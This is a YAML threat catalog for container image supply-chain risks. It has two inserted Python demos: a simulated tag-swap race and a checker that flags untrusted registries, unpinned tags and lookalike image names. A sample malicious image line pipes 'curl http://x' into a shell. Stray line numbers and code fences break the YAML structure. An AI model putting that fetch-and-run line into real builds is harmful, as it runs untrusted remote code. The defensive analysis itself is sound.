# Container Management Tool Security Threat Catalog (ThreatCatalog).
# Conforms to Gemara #ThreatCatalog (threatcatalog.cue); gemara-version matches the schema tag.
# Scope-specific capabilities live in capabilities.yaml (CapabilityCatalog).
# See threat-assessment-guide.md.

title: Container Management Tool Security Threat Catalog

metadata:
  id: SEC.SLAM.CM
  type: ThreatCatalog
  gemara-version: "1.2.0"
  description: Threat catalog for container management tool security assessment
  version: 1.0.0
  author:
    id: example
    name: Example
    type: Human
  mapping-references:
    - id: CCC
      title: Common Cloud Controls Core
      version: v2025.10
      url: https://github.com/finos/common-cloud-controls/releases
      description: |
        Foundational repository of reusable security controls, capabilities,
        and threat models maintained by FINOS.
    - id: SEC.SLAM.CM.CAP
      title: Container Management Tool Security Capability Catalog
      version: "1.0.0"
      url: https://example.org/catalogs/SEC.SLAM.CM-capabilities.yaml
      description: |
        Scope-specific capabilities (CAP01, CAP02) for this threat assessment.

groups:
  - id: SEC.SLAM.CM.FAM01
    title: Image integrity and supply chain
    description: |
      Threats affecting container image retrieval, integrity, and trust.

imports:
  - reference-id: CCC
    entries:
      - reference-id: CCC.Core.CP29
        remarks: Active Ingestion
      - reference-id: CCC.Core.CP18
        remarks: Resource Versioning
      - reference-id: CCC.Core.CP01
        remarks: Encryption in Transit Enabled by Default
      - reference-id: CCC.Core.TH14
        remarks: Older Resource Versions are Used
      - reference-id: CCC.Core.TH02
        remarks: Related transit / interception threat from CCC Core
52
threats:
  - id: SEC.SLAM.CM.THR01
    title: Container Image Tampering or Poisoning
    description: |
      Attackers replace the image behind a legitimately published tag with a
      malicious one by exploiting tag mutability in the registry. The risk is
      greatest when the container management tool resolves images by tag rather
      than by content digest, because nothing in the pulled reference binds it
      to the content that was reviewed or approved. A poisoned image gives the
      attacker code execution inside the workload, enabling unauthorized access,
      data exfiltration, and compromise of the host or cluster.
    group: SEC.SLAM.CM.FAM01
    capabilities:
      - reference-id: CCC
        entries:
          - reference-id: CCC.Core.CP29
          - reference-id: CCC.Core.CP18
      - reference-id: SEC.SLAM.CM.CAP
        entries:
          - reference-id: SEC.SLAM.CM.CAP01
70
  - id: SEC.SLAM.CM.THR02
    title: MITM Container Image Interception
    description: |
      Attackers redirect the client to an unauthorized or malicious mirror so
      that image pulls (or other artifact downloads) fetch compromised artifacts
      instead of the intended ones. Redirection can be achieved through DNS
      spoofing, an on-path (MITM) position on the network, or compromise of the
      registry's name resolution or HTTP redirect chain. The client believes it
      is pulling from the trusted vendor but is served malware or tampered
      images. Pulls over plain HTTP, or with TLS verification disabled, remove
      the only protection the transport offers against this.
    group: SEC.SLAM.CM.FAM01
    capabilities:
      - reference-id: CCC
        entries:
          - reference-id: CCC.Core.CP29
          - reference-id: CCC.Core.CP01
      - reference-id: SEC.SLAM.CM.CAP
        entries:
          - reference-id: SEC.SLAM.CM.CAP01
          - reference-id: SEC.SLAM.CM.CAP02
89
  - id: SEC.SLAM.CM.THR03
    title: Time-of-Check to Time-of-Use (TOCTOU) Image Substitution
    description: |
      Attackers exploit the gap between when the container management tool (or
      pipeline) validates an image and when it is used. They modify the resource
      after the check and before use, for example by replacing the image in the
      local cache, swapping the file on disk, or changing what a tag resolves
      to, so the tool runs or distributes a malicious image that was never
      checked. Any check performed on a mutable reference (a tag, a path)
      rather than on the exact bytes that will be used is exposed to this. The
      result is compromised workloads, credential theft, or supply chain
      poisoning.
    group: SEC.SLAM.CM.FAM01
    capabilities:
      - reference-id: CCC
        entries:
          - reference-id: CCC.Core.CP29
          - reference-id: CCC.Core.CP18
      - reference-id: SEC.SLAM.CM.CAP
        entries:
          - reference-id: SEC.SLAM.CM.CAP01
          - reference-id: SEC.SLAM.CM.CAP02
109
  - id: SEC.SLAM.CM.THR04
    title: Supply Chain Compromise from Tag Substitution
    description: |
      Attackers substitute the content behind a mutable tag (for example
      "latest" or "v1.0") by retagging a malicious image or by publishing under
      the same tag after the legitimate one, so that consumers who pull by tag
      receive a malicious artifact. CI/CD pipelines and deployments that
      reference tags rather than digests pull the substituted artifact,
      introducing malware, backdoors, or credential theft into the supply chain.
    group: SEC.SLAM.CM.FAM01
    capabilities:
      - reference-id: CCC
        entries:
          - reference-id: CCC.Core.CP29
          - reference-id: CCC.Core.CP18
      - reference-id: SEC.SLAM.CM.CAP
        entries:
          - reference-id: SEC.SLAM.CM.CAP01
          - reference-id: SEC.SLAM.CM.CAP02
128
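# Added example (not part of this catalog or the Gemara project): an in-memory
# simulation of the THR03 race and the THR04 tag move, showing why a check on a
# tag does not protect the later use of that tag, and why resolving the tag to
# a digest once (CCC.Core.CP18, Resource Versioning) closes both the retag and
# the cache-swap variants. FakeRegistry, scan_ok and the image bytes are
# constructed stand-ins, not an OCI client or a real scanner.

```python
"""Simulated TOCTOU / tag-substitution race against a mutable image tag."""
import hashlib
from typing import Callable, Dict

# Constructed image contents for the demo; the marker string is what scan_ok rejects.
GOOD_IMAGE = b'FROM scratch\nCOPY app /app\nENTRYPOINT ["/app"]\n'
EVIL_IMAGE = b"FROM scratch\nCOPY app /app\nRUN curl -s http://x | sh  # MALICIOUS\n"


def digest_of(blob: bytes) -> str:
    """Content digest in the OCI 'sha256:<hex>' form."""
    return "sha256:" + hashlib.sha256(blob).hexdigest()


class FakeRegistry:
    """Minimal registry model: immutable, content-addressed blobs plus mutable tags."""

    def __init__(self) -> None:
        self.blobs: Dict[str, bytes] = {}   # digest -> bytes (stand-in for blob store or local cache)
        self.tags: Dict[str, str] = {}      # "repo:tag" -> digest

    def push(self, tag: str, content: bytes) -> str:
        digest = digest_of(content)
        self.blobs[digest] = content
        self.tags[tag] = digest             # tags are mutable: a re-push moves the tag
        return digest

    def resolve(self, tag: str) -> str:
        return self.tags[tag]

    def pull(self, digest: str) -> bytes:
        return self.blobs[digest]


def scan_ok(content: bytes) -> bool:
    """Placeholder for the validation step (scanner, policy engine, signature check)."""
    return b"MALICIOUS" not in content


def deploy_by_tag(reg: FakeRegistry, tag: str, between: Callable[[], None]) -> bytes:
    """Vulnerable pattern: validate whatever the tag points to now, re-resolve the tag at use."""
    if not scan_ok(reg.pull(reg.resolve(tag))):
        raise RuntimeError("scan failed")
    between()                                # the check-to-use window
    return reg.pull(reg.resolve(tag))        # may no longer be what was checked


def deploy_pinned(reg: FakeRegistry, tag: str, between: Callable[[], None]) -> bytes:
    """Hardened pattern: resolve the tag to a digest once; check and use only that digest."""
    digest = reg.resolve(tag)
    checked = reg.pull(digest)
    if digest_of(checked) != digest or not scan_ok(checked):
        raise RuntimeError("scan or digest check failed")
    between()
    used = reg.pull(digest)                  # a moved tag cannot change this lookup
    if digest_of(used) != digest:            # a swapped blob/cache entry is caught here
        raise RuntimeError("content under pinned digest changed between check and use")
    return used


def run_demo() -> Dict[str, object]:
    """Run both patterns against the same attacker actions; return what each deployed."""
    results: Dict[str, object] = {}
    tag = "example-org/app:v1.0"

    reg1 = FakeRegistry()
    reg1.push(tag, GOOD_IMAGE)
    results["by_tag"] = deploy_by_tag(reg1, tag, lambda: reg1.push(tag, EVIL_IMAGE))

    reg2 = FakeRegistry()
    reg2.push(tag, GOOD_IMAGE)
    results["pinned"] = deploy_pinned(reg2, tag, lambda: reg2.push(tag, EVIL_IMAGE))

    reg3 = FakeRegistry()
    good_digest = reg3.push(tag, GOOD_IMAGE)

    def poison_cache() -> None:              # attacker swaps the stored bytes under the digest
        reg3.blobs[good_digest] = EVIL_IMAGE

    try:
        deploy_pinned(reg3, tag, poison_cache)
        results["cache_tamper"] = "deployed"
    except RuntimeError:
        results["cache_tamper"] = "rejected"
    return results


if __name__ == "__main__":
    print(run_demo())
```

# In the tag-based path the scan passes on the good image and the evil image is
# deployed; in the pinned path the digest resolved at check time is the only
# thing used afterwards, and recomputing the digest over the bytes actually
# loaded rejects the cache swap as well. The same structure applies to a real
# tool: record the digest at admission and pass the digest, not the tag, to
# every later pull, scan and run step.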
  - id: SEC.SLAM.CM.THR05
    title: Container Registry Typosquatting
    description: |
      Attackers register container image or registry names that closely mimic
      legitimate ones (typos, homoglyphs, character omission or transposition)
      so that users or automation accidentally pull a malicious image instead of
      the intended one, leading to malware, credential theft, or backdoors.
      Unlike tag substitution, the legitimate image is untouched; the consumer
      simply asks for the wrong name, so the control point is the reference the
      tool accepts, not the registry's contents.
    group: SEC.SLAM.CM.FAM01
    capabilities:
      - reference-id: CCC
        entries:
          - reference-id: CCC.Core.CP29
          - reference-id: CCC.Core.CP18
      - reference-id: SEC.SLAM.CM.CAP
        entries:
          - reference-id: SEC.SLAM.CM.CAP01
          - reference-id: SEC.SLAM.CM.CAP02
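# Added example (not part of this catalog or the Gemara project): a static
# check over image references that a container management tool or CI pipeline
# is about to pull, keyed to the threats in FAM01. It parses the reference the
# way docker/containerd do (registry, repository, tag, digest), flags untrusted
# registries (THR02), references not pinned by digest (THR01/THR04), and
# lookalike repository names (THR05). TRUSTED_REGISTRIES, KNOWN_REPOS and the
# homoglyph table are constructed policy data for the demo, not values from
# the catalog or any product.

```python
"""Static checks on container image references before they are pulled."""
import re
from dataclasses import dataclass
from typing import List, Optional

TRUSTED_REGISTRIES = {"registry.example.internal", "ghcr.io"}                  # constructed allowlist
KNOWN_REPOS = {"library/nginx", "library/redis", "example-org/payments-api"}   # constructed allowlist
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")
# Minimal homoglyph folding for the lookalike check (constructed, not exhaustive).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "5": "s"})


@dataclass
class ImageRef:
    registry: str
    repository: str
    tag: Optional[str]
    digest: Optional[str]


def parse_image_ref(ref: str) -> ImageRef:
    """Split registry/repository[:tag][@digest]; the first path component is a
    registry only if it looks like a host (contains '.' or ':' or is localhost)."""
    digest: Optional[str] = None
    if "@" in ref:
        ref, digest = ref.split("@", 1)
    parts = ref.split("/")
    first = parts[0]
    if len(parts) > 1 and ("." in first or ":" in first or first == "localhost"):
        registry, rest = first, "/".join(parts[1:])
    else:
        registry, rest = "docker.io", ref
    tag: Optional[str] = None
    colon = rest.rfind(":")
    if colon > rest.rfind("/"):              # a ':' after the last '/' separates the tag
        rest, tag = rest[:colon], rest[colon + 1:]
    if registry == "docker.io" and "/" not in rest:
        rest = "library/" + rest             # Docker Hub's implicit official-image namespace
    return ImageRef(registry, rest, tag, digest)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fold(name: str) -> str:
    """Normalise common homoglyph tricks before comparing names."""
    return name.lower().translate(HOMOGLYPHS).replace("rn", "m")


def check_image_ref(ref: str) -> List[str]:
    """Return findings keyed to the catalog's threat IDs; an empty list means the reference passes."""
    img = parse_image_ref(ref)
    findings: List[str] = []
    if img.registry not in TRUSTED_REGISTRIES:
        findings.append(f"THR02: registry {img.registry!r} is not in the trusted set")
    if img.digest is None:
        findings.append("THR01/THR04: reference is not pinned by digest; the tag can be moved")
    elif not DIGEST_RE.match(img.digest):
        findings.append(f"THR01: malformed digest {img.digest!r}")
    if img.repository not in KNOWN_REPOS:
        # Only near-misses of known names are reported here; whether an unknown
        # but dissimilar repository is allowed at all is a separate allowlist decision.
        lookalikes = [k for k in KNOWN_REPOS if edit_distance(fold(img.repository), fold(k)) <= 2]
        if lookalikes:
            findings.append(f"THR05: {img.repository!r} resembles {sorted(lookalikes)[0]!r}")
    return findings


if __name__ == "__main__":
    for sample in ("nginx:latest",
                   "ghcr.io/exarnple-org/payments-api:2.3.1",
                   "ghcr.io/example-org/payments-api@sha256:" + "a" * 64):
        print(sample, "->", check_image_ref(sample) or "ok")
```

# A reference is only considered clean when it names a trusted registry, carries
# a well-formed digest and does not resemble a known repository. The transport
# side of THR02 is not visible in the reference string: whether pulls tolerate
# plain HTTP or unverified certificates is a tool configuration (for Docker,
# the daemon's `insecure-registries` setting), and that configuration should be
# checked alongside the references.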